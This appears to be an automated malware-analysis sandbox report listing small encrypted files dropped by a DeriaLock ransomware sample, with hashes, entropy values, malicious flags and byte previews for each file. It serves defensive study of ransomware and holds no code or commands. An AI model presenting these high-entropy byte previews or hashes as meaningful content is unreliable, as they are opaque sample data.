                                                                                                        Preview:^9.....+..2+.}nb.0...LI...2G..F.u....>.....\j.....I...6...>._.1O.&2.}m.....[s.).F.J}....s|d.c.......*..p./..$.......Y......?...+..oj...uU.,.....R.c.E.I4.*.P....c2...G....z...F@.P...\....7#.m..h...lah..(......bS33iI\.........X..h&...n..H.T..".h...)...K.Z...Ck...=.v.......6.&..B.~..,z&n.>..d.7R...0.P...Q....N...y...x8i..a..y#....GFN.....i5..oN.F...t....19.P>.b.U.l;{....%..qz..D..'.*8.b).. .w...0.lU~4.h.i.a.F.Z+..o*..qd..6G..2..9[..............u.mWxc....n...T..5.%P.dy....{,.f.EEU,g..cd....!2...6.r..........Av..\s<.V....;..I...k..`..%.|HN.3khj.]. ..o..f`...._.0...Aj.+...x5........Qh;.HqOv.......J.4.v.n........[/..z...|@.7.,.O.BVN....l.[X.|...m.Gv...h`bY#....D.~.+.F...,..t8..6+.....L.._d.5.>....X...E2..#&m*rK..t.....G,G.4..=..Tl<........C.>.....4\.....6=.....".M..H..n.f.'....K...^....]..d.....bhb...d,.b.....+.g....5R..............G.A..*...fM0....oI...A.Q%..QF....F...7.`........)).fPz4.1Z...B@.u.n.......P\d.7........."..kZ........e`...'.{yQ'W)
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.848926243504784
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:nbtVaPerMaGHE/VQiU5NuQ64q3knrpumTft+g687u7ijvIo5A5h39pH:btV7r4HE/nU5NXF8Mr3zc8YijvIo5INl
                                                                                                        MD5:D0DAA5507930221B86FE66A01A803536
                                                                                                        SHA1:FA0E34049BF2E59FD59968869E14F81B34794C8E
                                                                                                        SHA-256:CACA4CF9D6F8452C89A7E902F6CE52E5BE2D46B8C6360044368782ECAF77A3C9
                                                                                                        SHA-512:F50FC906808D9D079DF8B5D0FA398EF4C9813ADA2047711B5D893086CAFC0759B60CC56D31CC0B8EEA5F994DC7BE4B8F4DCEA4CBD6D580C8AEFC4BFD607CFA06
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..k..]3.^.....x...s..........yh....~...GF..."...g9.gK.....c..m.qv...v........$....?.h.z.%.=.4E..S.!N........?....5..././..BN..n.D.\.2..0....4%(Br.>M..NXilf.uOe........d..#t..~.qq..v..e./..D..Z5.k...Xj..D.......Fv.......a.z{.;..c.^.3.V.7O.X$.T...#..........t.....v($@..D..|].h.T...A7....q.SXa.Zj..a1c.}...w..'<.....W.P1..B.lEE.^...8..Ge..P..m......p'.l..54n.]&.o.....QH..5C.F."R..<.(......M#y.8sg..U....[....@......$...R..Y.-M...k....O....J2...<..Ov'.....P.z..-... .....#.1..9....Pb!P........2&.zY>........^M..K<.J.c...5..6.FY.-.......)......U......y...$\...h...Nba;...q..U........d.S..%.....2.o..o*..q.+.Z.Q.s/!.A....}z..=k.dS@.H.........O.?).5..............C..Jx.b.._m.&T.8.....`|...KYj..a_.x.H.T.'.....'....X_.#.,.....~x.b2.b..q8w........nI.~.+..X.z .>.=....;.V0JPp{......P^..r .$e+.........J;.....e"...%..+......C.....L\.L.2(..~*.....z..O...W*..g.]?`..y..|.4E..#....k<..T......]E,<n.a.|..S..{..,&h...Y..gz...c....j........=.r.L."
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.828027720274939
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:/7H8P5u8B10X+Ox7K5bglvwH1n0l5AVtJQUz2mNmnYuMI86Sjp8Dpq1:DcRbSx7K5B0l5AfJQNnDMzjp8Nq1
                                                                                                        MD5:6E847EED6C7CD3301808F86B197A10B1
                                                                                                        SHA1:B948D7CDE4D88FB3B2289BD3FA4889D07CE95D35
                                                                                                        SHA-256:963AA7AA362A9D6C4D31C64C6768A1B835430D54B82E22ED01DA1B450B444BF5
                                                                                                        SHA-512:618717E4C292FAFD5E64D2C0156D7131EA7BCD91F37F10972C9552F64B8EBF47406723078533D71E69E719DDB9BD227F973AA519FFC5F7E67A45F8C0A9B5E22B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..H....U".....z.ey.N.Tuj.Asv..f...|.Z.X^.".B.QW.`.B{~...#(...F.*.n..h.6......F......(.$.U....q._.r...h-.Q-L..!.....}.:....a}..n.Wz.....[J.4.yP..\..g..`.{g.'.E.......9BqF....)..N......$|..gR..L..V...?...[..b..X..da\.N...^.(a~+4...3*y.5.I........H.Qf.0.........K.......N....g..u..psL.9..c4!.......N.<......|h..J$.Y..&.Tt-..X...\.L!E.C.3.0g..j..c..U......~HA..|...........3..F..?$...N...I"...qw.^,..Jo......Bm.p..L.....vd../..>.....&9..7F8w......+.v......n......A.>8..\.L...T .........T....:..c..Iy.C....t.=...'.....5.....X.K............_...e...Z...e...&@......3-.m.2`.j..c.{k..A#u.3.t....=.22&9...G...\..&.....g..At..v..(`.6O.Lj...fT..%Z1.Ta.@....5.m..E..N..1.Z9..#..QgA..>....O...*C.ns9...l..2....lqfG.Y.k@..._6-..8GP...z..3.....Lot,..X......KKz.<..$i....m.....J..r...+Q.C.....!].I)..vB..j|...\..d.=...hp.D.tY.z.9...p.,.0...7.|b.......`...c..............>h.@.-..h..x.....v..~].(.B....a.Y..u.n..../.?e..>.|,[I;...SQ....@2.Np.....{..2.....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.807351928385191
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GzNoLJ4ZP/itIqc2eNNsk6JswzSkVko0QWuWtKLikzdi1kZWR:GzNoLJuPKej2efsk0sISDfuWtk5im0R
                                                                                                        MD5:6757CAD0E85A3CB89C275519A9388508
                                                                                                        SHA1:8A26F09B2BEA9859E11454EC1AC6A47F0928FB91
                                                                                                        SHA-256:57496AC06F65FEA4115FFC813C29D0475D0A62DA4E55DAFABFA113E0EE1B435D
                                                                                                        SHA-512:60F00D51283912E066A9F0DFEFB43EFEBC37C92EC25ECAA6E1CE96B185B359949CBE5A1FF2DC646D17F3EBEA04D95FC5EACA26969911CEB9B893BDF2CE9B636B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....9...w.5..........kR.v....L6...m..J......SS#Z.Z....b.o....sr..M..!.*.;.rL..U5.p..b.Q..)...G....I..7{B...`D.l......~....E[GP./...W.X.i4"..Yw.I.}..+....M6V..g^.....H.E8..I)*...z9r..L..avX..O...6..}yT..X}.gO<...e....W..]..R..\.T..;..K..#..L......[.V...as.......w.b\.F..,.O...oj6..@>....EUcp....!.O..z7Y..~Z.jL..U....W86Z...M?r..6...4[.,....dB..]l..2i......v........v...mg\d9..u8..rrwN..i..p..../.8..l.D..W.[..+H..y.~y/....B.>o$..g..Z;T..O./.....Ux.B>.$..{...^..x]E]..Fe;.WZA..h..7j....[....I.~)L..u...{B...7..*..."....-J.y..._.A..B../et......L..k6.~..Y..bBJ..=...>.D..o7.c3.R..4;. R&....a........|.$`c...Y..Dn..o...T.....Y>.B}_.X_.I..tX.^.G...^Z.T.YVx....EzR.|.s.....}.B.....8x.....3A;..O...ao.]..9V..U....cj|.z9.4E.Tb..w..C...@:..}.r../hL...(.\B~..4JXL..}..9^..H.u.b..,...yX.!..T.#q......_.0dil...\.BPA ...Nb...M$.rQP.....R8..._.St..j..RyKB.....8..q{..p..8.nB&.....o.....e..sf... .b..k.N.A.lS.......m.6E......I..G)I.....:..G8...a.5.......}.....h.h.....S...
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:DOS executable (COM, 0x8C-variant)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.836334165377041
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:GBx2yozxAbUmYQOAR+qN1DC+lfwpNy8oVOJZkq9f:mxLozGh+8DP8owJ+qJ
                                                                                                        MD5:25C82A71D6A1ADB00DFDFE851052DCA3
                                                                                                        SHA1:89E2AE8CEB8DBD05F6194A82EAA69AB1D96426F4
                                                                                                        SHA-256:D403FCEF9F337C454D15781E554E44F9231900EA500C634077742B02B85AB733
                                                                                                        SHA-512:D1A412214342203FF277575380BB86BEA688C54D15D01B8E9472F9B593EA8D5A16436DD6898385EB0268CD90BD82D3C51ADD634B9027BCE0FEE695B4EDB82520
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:....Y*....I.9..U$.0g.-.<..E.*^(..d.?..*........tJi.?.vJ@.]...T.@.q.1qC.....z.A>..e..&..zh.9G.5H@...9...{....bfR~.2K..K...T.[n.$.....&.I.%..m......1....4.M..?.b.G.[...y.6..;.....tyR{5.V.:^..W~....yP./...u^....J....AM-}.)..u.].....u.~.[.h4....o(f.o>.!.....K........J7..\.,..#....*i....W*T....UN....."M.._....!R.P.......`5=r.4.H..K...7..n......g.I..m[.9+?..A,5.].~W .Z.[...E...6$....j_..u{v.=........_.E.5n..9..\>..^...5.g$....k......Z...Ud.9....%'...M.....O....,...U..8....L..;..z.%@..y._q)M...k.....1.D....`.-.\..Ro......PF..].5R.h.q....i=0..r8.d..K.d5Z..-....R1....l.llU.Z...#...o..5..........3.oE..S....}.I..!Ql.s17.ytqUF`.#[b.....'...i#.o...u$.8.%J'...W.....|j.uP:..T....<.p|...G.'.9...%;.....y...@L..2.s.....HO..W.N...y..*1.y.6..R.q-..k....D`.....7......-2...#..x.K...2..UoHu ....+...!.y..'n..i.iF..z.G.s.n.6 C....M.U...b...~...s..9...H.W#..6.%_....,Q$.\.Ni.F..e!l.-A.=..7.k~.R.EzY......u.{..D.|h;..c......EQ...v...x...c.>zU...7...w..S.Y_.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.773908532302792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gwau5l/i9JYUXB2twzp7N/g7EAshi+yLoRnoMkz:9aYiXYUxKoP/hCFL
                                                                                                        MD5:813A7D25DC89338D29BF4BB583A4F17E
                                                                                                        SHA1:9FFBC5C65114277169B7381AD35430FBFCC9C663
                                                                                                        SHA-256:0B42D2B6FCDF82602F21450740C83A64365B2C36A733C67B51AB08BFA5C4DC93
                                                                                                        SHA-512:13198E8CA13E67C36CABC4E1497F4900FD9F46A9F264AEB089F3EA7D1CD21F14511453ED73CA0F6936812890B0318F2F80429D94E80421E4E2BC7BEF558AF48A
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....)..*ghKL4.2..s..4I...%.N.8.......MV.|...8...v........Uy$.=..hV..j........!N.'(...m...../.....|.:....*%.."^8.....s../...4.....6......R.ZR#h..$0i...P.OPa.@..[..#......tl.|K$...*...\.M..</py-...!.Y1TV8.^..U.....9.@ ....|D...\hz.v..t..!._...B..Au.Q..=s..35 .-..a.b..;.....`....<.=.Ye;.|R.....6........(t,..}..?7Q5..J.e.hmr.S....K......M..g.k%.g..}.Ze.r?l..,...l.U~..?.....;.od.J..u..yw1.....s...{[.-...+w\X.........iA:.s..*..YQ..[...r.x.I......e-....t{.=\..........[.ej....K.es+....:2?...<.K.1..Z.....T...*?./[.YP...u3..5......t.....?....Xu...u.e.kn.hY...{.P8.;4..Y......h.l5.OB.......y...i!..7....jC...B.~fY.D.k?yO...E...7.j3..a.x.......x%..&..@3..Y..._{.W....V...t.I.4..6.Y.kqn`....*Y].69...q...,....*......x....a{..Y)..9.....1x.:i.4p.(!P.?......}.kNa.....`'..^..N..7..@.-(..U.'.+.j0._;`R...N.xC........R..).J...!.*..v.......C...S+W} ...e..VA..j}..;YF......v..k.6r"..^....HN..a..]gvV...{...th.s..|..zBT....|....@.3F.7:..*/....S....JKsY..8y......?.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.82364503797505
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gkQpVuanbaF9NlvvuXWgurY5DewGzPyzJHiTb1DbCSA:+9nWn+GgurYDeT7yzQtDOB
                                                                                                        MD5:0698DDACECA58DF19B729799BF1F5F3B
                                                                                                        SHA1:73E6499484810CA2BA8F6C789E23C91E71E98269
                                                                                                        SHA-256:FE225965551B3F123538EE8E13AC8BF8FC5B11A36937956F5158662F50AF9CF4
                                                                                                        SHA-512:0DA024CBC63B09E690545E7821E89DC0924B076491E5EC690655D626B593CFA0EE50B5641F4864CDEEFEB388F2756854AB2D624D3829CDD47BFB146A49C46971
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..K../Ny.0.RE>n..v..~...|r.....9b-.%..['...K..L..2... O)..y...y>\..pX......i.x..8..V......*...%...q/P..3..x1`y.B&32..A.Hv/?..].Fj... |._[.4........=."........P..Y...VB.<./..v........a.2W7......Q...;...;..?..S..B.4....C`;..}..q..9)..9,.v.......?J..BpM_..@H.D.A....&.../...i...`n..._(.gk..".^.Md.c...dN?.w.V{...1...4.b...1.m~...=..2.|6.2.'"v....1........d.j..=...6o...G.T.N..9....;.|...L5..G...........;t..j......>...+.....'..x..V.q..0PT>...JJgy.........vkN..CN@.Q....2...n^.1D..}.Yg.Y.Y..H_..al..&...2.p...$.....2!..\w....{...w..x....Zf....z.':U.].;t.^...v..."..n...}V..:..,W#?...#Nu.......f..Fh.Y+.[..R.....asz....7h)q.K._.:..\.?...\./....Qx.`G..Z.Y+.~.......b...G.3..to..{.6^.Fq.y.'E.H...d.}.|..X.R.3.vXeG...e...[8.....P.$h.....".d7E.... ..... .m...V<.a......Q$w...?.... _.<..eo..(p.i)...AQ.]/..V2..!S.Q...y%up.Q....W.#..i.a3[.\4.4H..;..a[....n?,...m...J.OR.q.........}...._...5/'.w.....>6r.B`.*,..\..p|<n..G}.x8..7.?JO>7.u.w:..c.....'.1.....l.........
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.800787004118871
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:LoUpFolZ41/W4f5pHpyNzQuS4RTWzU5nsn1j80v0O4uNixIg2HEtjSmf:LowFolZ41xpHpyNz9RTP5Ej80MKIIHk/
                                                                                                        MD5:63278C5A89725C0BB8AD8C8EBBAD80FC
                                                                                                        SHA1:096F9965577FDC95B9D483D19087E6F9567D2B13
                                                                                                        SHA-256:9AE5DA350B08D3FC9651926FC340B9A65A48D92650B727343D8C5D5E269C46D4
                                                                                                        SHA-512:D6A56BA17BDC58EA7DBCA2DB9C93128285DAA2FB93366C2227838C5FDEF73339640FA18AA613B3705F7E2C59FD56478D647911F75EEB92BC5777FB5561195537
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:...`..DB.X...<'...@d..?NA..T?Z.TMvx..w....Qs#....F......u...x.>c.....*....:.......A.:%..n..K...qtzG..?1o?H......H..&.,5..uv./.."X.].#I=....o...-..>-.Ev..Ea..=...0.....ZR]g..>.`.........M ..pM.7..e..m.P..u....@......a,..8..L....G.7..O#.Z..../0.n..6..K...E.......,s\..BSG..J0.H..]%...i.........@.....W..Oe..s..5Ji.I8:...Q.J....?...$.V......fu.@....a......3+/9.h..E.R..C...U.i.N]..x..dI........q.RX....Q.T...a.~.;+...m....?n....7g..r..'..G.j...8....-n.......:.i|\S.......J.#z.D*%3..........n...96h.0or.,..xI....q......'.7.....m....\.6h....... ...o..l.O..&;)&.Zl%......,...(...".y..\.G.Q..sQ.....FU... ..C[V.[".>..0.3-1.t^.a....E9(.1"....o.L....t..L*.(D+H....i....F...wM.gf....fkx.b.8.....*S.W.~.c....]vo~@..383.t.....T...bM.f...iB. ..w.Kc.......3.(..u....#.qq~..j.U.."".*:./..W.....#....!O]..$".t..l..U.\^.....W...l.L.'mc.l...%.T..H......d...t.r.n.As..H.1+2"...GVt...&.O...6..?.b.}....H.XS....8"...,\G..vK......>3.;.C...H.Vi.....1V"..b......[.n?.L....R
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.83286502370842
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:JMhq34lkMFF9bFrySg+ClzrN+s5cEaKNbCI64wkSjrG0JYuo:JMhqoGMzz2Sg+C98sZ2IxtS/G0W
                                                                                                        MD5:A850A2AC93573274BD1403987B8825E1
                                                                                                        SHA1:E1E587E459483A0E1E9CEA058558821A44E5EC86
                                                                                                        SHA-256:E039C018FB68EDF6B7959F3D5218E4504704C47641112661E49C9660E42BFA04
                                                                                                        SHA-512:6705E939E9E8FC771FB052B62FFF6EA1A432386034DDC2E0DA2E1E963023758A91C72F89B19690C0F1200DD36DB2E54D34840DF9D7CBF60E50FAC4D7156F9E10
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.O.."j..n....5.}X.N...z;...@Vo..R...pQ.3.H.....a.^~...u.K....H....U....]W/+[f*q'.e.<P,...#...g..B.Z:,.#.N.4.$../...b.%..HA.J_.IA..Ny.8J.`....T.[_.....N.F..P.6D.K.C.B....P...w&...y.z...A.....;{.Z..)....\T..#..t..[...%gz....p[...;..=.t.bD...o...E.N.eG>...G..t......!..O.)..({.|..3.......`'P..].|W...A".z*...2.....3jk0....#...cW0EY`. ..5K.$5!)..3`<.....$.h.W....0R5M.'R.\.....Kb...u..F.s....Z#\....D....!........$N....l.].5w.F.H..G...$3.y...%.9.......Ba~..b*.s...4`.@5.?.hZ8e..F...5i.S...i...}..K...<....t+.3..0c.y..L.?n...h].#s..S.j..K.4...(..9f....2.]......M.KW.X....A..M......c.......g3\.X.... cH.~......a6E!a.H4x.=...`/...0{.5...t........C..!..Wcx....%Dt.5B.b?.}........x."..oc>My.QZ+.*k....W.....j=..1.......9.6*.....9.E"...._..a2%P...4@1.Y.pY..]..SK.#i....r.u..(....BC..d}.ev..h.C....(ma:.N.o)..{e(.....W.....e?../....@,-.[....5..J..p..d...../=.i k.m....`.\.d.Y.Q.j.y..'+$.C]SG.h.i[...~.PV%...8.|.Z...?..gu..e.k..^gb.......n.o.....I..{f..6..o.{}.}.Q..m.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.791975981035376
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:vkROOfDwJrqpP42g6btQF9k/FZi9Mc2xcFvE:oOOfDqepZ1QLx9MBxcFvE
                                                                                                        MD5:35FB831D48CA02E21C532B6B14D6505D
                                                                                                        SHA1:6305682A1A5031DC9205BBF5FCD4FFBC93D8F417
                                                                                                        SHA-256:D08D20D32DEF2F48A2F0A91E1FA9B3A10334F660EE509422CF43DAD8F40B4D7E
                                                                                                        SHA-512:BCDABBFA0DEEDC6FB24C3BC17EE0237339647A239074FDC40B6D65DD826E3E002D8190FD6D26C64F337E1CF42E2C32B0A30D97412A2AB4BA9E67A7EDDDD6D168
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.....|..o......2J...h~.....x.d..F.$x[.. .?..Ie..aY...G...s....I"......z.F(2.\.B..k~A4#.*...../2e........~.8..Y.g0.dd.Q...6..X<...og..._..%3`..i.h...e..*..X..'r+..........{Q....&:.._{X..e.hc2&Y../...u+fK7.[}i.}.<J..4..:.4~.C..gz.@......dVG}&.....<.f_...o.S..O.........5E.....kfJ.&.Na.......y.?T.X.B..o.m.E..5.H.)..b2E.......].7..4.x!.y..ouw..JWT{3......<k...4;........2/..7ae.x......X....GZ.x.^A.BF.UZ..w...$..Ti...[..s.,[........."u......+........m. L'...K..q......gB.\..$....U..b....4`.Qv."Q.(]\.A....U...4.......zy.t9V..gE.a.d"M...MV.........a..q.!>.o>.T[;K...#~....X..Xa..&..e_...0...gG.U..1....9)..Si....R...(j....1..j....(.......N.Q.\T........PCc...C>....._.....k'..|..F.E'%....%..bD...VM....i.Z...2u2..j0....*.....A.G\..J.=. ..../.np.Ii..u.ke...1.~!......x....S.._..i}...Y...[...y../..2.........262.......-.........V.r;..*.dRi..v...._!4...G.s..F..... ....Q.e.SV[.j..X. ..Z..T.f.E..R.oe9.E..h.,.%&.b..../6*./.v.."..e...,Kv.K.[.U..^..C..{.(..i.MU..z
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.812523646037063
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:j16xN+rnU/PpIHz2vg+TVrXBDso2Dvfry1yfn:j16xN+rn+IHz2vg+JZs1ys
                                                                                                        MD5:83BBB83CADE449787391BD7B1A190557
                                                                                                        SHA1:3F33B2D84FC70C9CECA21AD8C85E0570B445A190
                                                                                                        SHA-256:ACF7F56F933F68D01082293170279878EF8A169D69C3134E0DEBDD2751409BFE
                                                                                                        SHA-512:7AA5C05F43BEC767B9F94D58FC4A9E9BA03AE3C162118757461FD6D36B58FD87FC5B6D7470BAD4925CF4FB6AFFCCF93DBD700EF9E58053DAFF13625DD57225B4
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.."^9...2^ke.B.(.p0'M.z=.8-....Z.6.@b...>...JHO..>.\..g....<.:hPn..N@5?.n.h%.r.M..:A.c.G.e..].p...]...q.c#?.`.c...%3.|.XU.5?..g...u..[.{....X.x.$.V.ix.i....c...M......4..kE..6..../...v..6(...r1Y.QE......!awq<...1..P,...?=.R."1..(..8...uf.Q.....w....D#.. ..G.&.l.....O}...(E..RmW..[..RH....6..h.."....1.....Q.Xda/..\ M..........y9.......c..}..\.9.+..D.".......X.R..3.ni.8@.5m.L.?.4.*K..+...V..&\U.8P.!g!$.r....".R..........v.c..w.Z$....C$. .....UH"Vh+.....VJ..*...z..{.(..3i..dbb......3D.....*V.D...J..?...\.MP.D..5...Z...O..a-..E.`...f.]..v...x.D....F...(u.........].m.....g..y.....#...3..G.t....M.g.u.x.V.v2..x.........O).}.{t..v4.w.0.\....|.xn.{!.#.+...5...^!.....^-Y........j...t...Z..p........u.q%........'..u..}..X..#....-...*.u...5.aP..L.Tx._H.ZG...R....I;.....&...D....#..fZ....f=...=.......k...!. <...!Nb0I=.|....5W.C....8.r._..ZV.NZ.M.$/.'.8.:..w...-..?........Do..h.m..'De.Ab....cs......]$.GK........R."..........L@.<.J.&Y....I.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.847466810302007
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:O+tBZlYQdFhfNBtEQEbF3H8OMlfXRDfvsmr:htTlYQdLHtaMlfX10k
                                                                                                        MD5:1A4EFAA187D38DD8606BA87546341B1D
                                                                                                        SHA1:FC515470B7A72FEB7180E040121836C01CB0E61E
                                                                                                        SHA-256:A2B4D9385F4BEAB0DD1AEC1B2B8B0C96CA342982B680D748EBB3722D8B01ADC7
                                                                                                        SHA-512:5044CC8E2C51CE3E6D6515B2D1093A49E66448116420C0B89AC32869F3D5FA7A1394F43EE17A05A2DC54156068B957FD869D9EF916AA1D1B2506053E942C8AD6
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:. >[:..]..Ha..y......IQ%S.Gm...Y..F.k3..qP%`{...G....BD...[....Y.I...f@..j.l......H.&.A..8+T.....oq.... ..P8'Q..@./.....#.j.{....nOd.vP."Y.+|.......a.F..B...{.!...)r.n.G...8.F....B...8...~....v1.c.|..'..E.2."|.</..L.W.Q.d...(I.....t..=A0..p...Ws.C...$.w0.r...Dnq...:.Y4.@5az8D..B..d.....Y..=..Q*.......|iZ...5.>..8..T8V......<..\..&..M.[).j...%.........3.|.....]Z6..\.Y..A_.<g.EGg.....h..'w....[.....Z.J1.t^.$K...S.......x`H\.Hx.....D...,.!...T .U..k%0......./..j...W.f#.[...&.........4ho..}....J.../.-..]tH.T%..t8KHZ..?e.k...0A.B...S0.v,8.......\.3.k~.r.I.....*.V<$...y|@..&!.~.?$w..z.A.._PH..z;Nt.n8#...\.4.......<l..D..Q.....N....h8O}..n._7....U..d.b...bC..3.y.L}..(.Z..:..Y.7.........H.....3.}[..Y.@....^."..m..."....z.w7..P...7GY.C.g...m"d...c....L..j......5.+..s.KYI.=...oa.?(.q....aU....y{.....`3..p<...+c[..5.|...5..n.dM.3XV..a...vw.QQ..V......}V.,..x.X/...... ....;!.a..>...v9.'e.....J."_W....O..K[;CFn!......+.<.G3..D..b...N{..&.}.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.821034008338355
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:Kz8e8FPtPNy7INRI1hUpYjIIo+uxUCt+mj2jvFvW7TulmAYNYAJn:KzPWlPNRmkr2rwGmAYN/J
                                                                                                        MD5:7ACD2FDB0BA20E6FEE01E3AA8709BA10
                                                                                                        SHA1:9511146E53C4F8925E6416397C1FA35917E4314D
                                                                                                        SHA-256:7E26206B1469D7FD83214A61609A6DE453B55BFFF26483BEA59D27B0E54FC4F2
                                                                                                        SHA-512:38DAE21AC8535BC7B77658C58B4FD1100CFD0F30469DEF90450FC78C807226FA22001E02F7BC65EC59A8D85C8EFF942132C3B93EA38BA59910DBB57EF6328461
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:2y..f%h.PG......}....Q...../..j]..DG........-.<Dr...7...../S.dU.C.sz.7.x.mt....?;........!RH.N.^.^..s.Ah...c.........o4.."..'9!.$.g.}....Y.>.B..9.,.Q...sIU..l.{.7nKF.q....{q.....a.m".@%@..6.E...V..`#8.a}!.......!.....-T4[.............m..]+}......g...Ab=.......v.......I.l.j.G.,.hG.6...Y..v...(q4.].o....u...G....!..O...x.mwR......UJ..F..>...>.....`..=...5......+.<.)...D...5N.1.2.G....>y_...Ko"..s..i..3g..J....D,...8._..9...].:o...o.T.. .=...=..g3.-rU.....{OW..e.....m8.....D...G.:.....f[0s.....t..+U.O..,;<......7.!H..\.$..W.m..W.9..-..@/...C.{J5.C).=..h.G...../.4.jb:.^...D...9p...J.m.."[C..;..|...I......f"D........n...x............(....I.....x..E/.DD...5+..#."..}iexc..^r*.0>...A.N..L.@...36.D...V.bbQ.j*.fUf../....[..9{.sNy.^.......Q....To::.......}y..dl.O..z..5J....r.....Ha.|..&.......\d..g..C.^..V/...._...m.#..hI...%.p1..*.dex....{..E.P..uY_...$..H.sY...........Q.~x..L.\.}.|0J....d...h.]...."NI....0).c.7.r.T.J.F?..=....?4....)&.."...A.9M.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.82725182222671
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:D34teGTb9+NnH676JZBkRRknBnUUy3rBBYVUunZ6pYtjyhAMyHVO:z4HMg6JZ2kBnUU+aUunMUjCAMyM
                                                                                                        MD5:6C48E8C0C851B97BB5200DB83F002E02
                                                                                                        SHA1:76F9DA958CD58906D8E302A7B909E66A82FA7EA6
                                                                                                        SHA-256:B229F7A5A7ED22DBB011FFD1FE04E0756058A9EC304957E9CD38CABDA14FF337
                                                                                                        SHA-512:B2465F614B902D3E27CB61859C211B1A1F437BD02F7E91C82B01FD0630F77A8677542D4B972C19C68D54B61320EC270F8FC1CD07AFBAF6017BBD8CB5DBABAD9B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
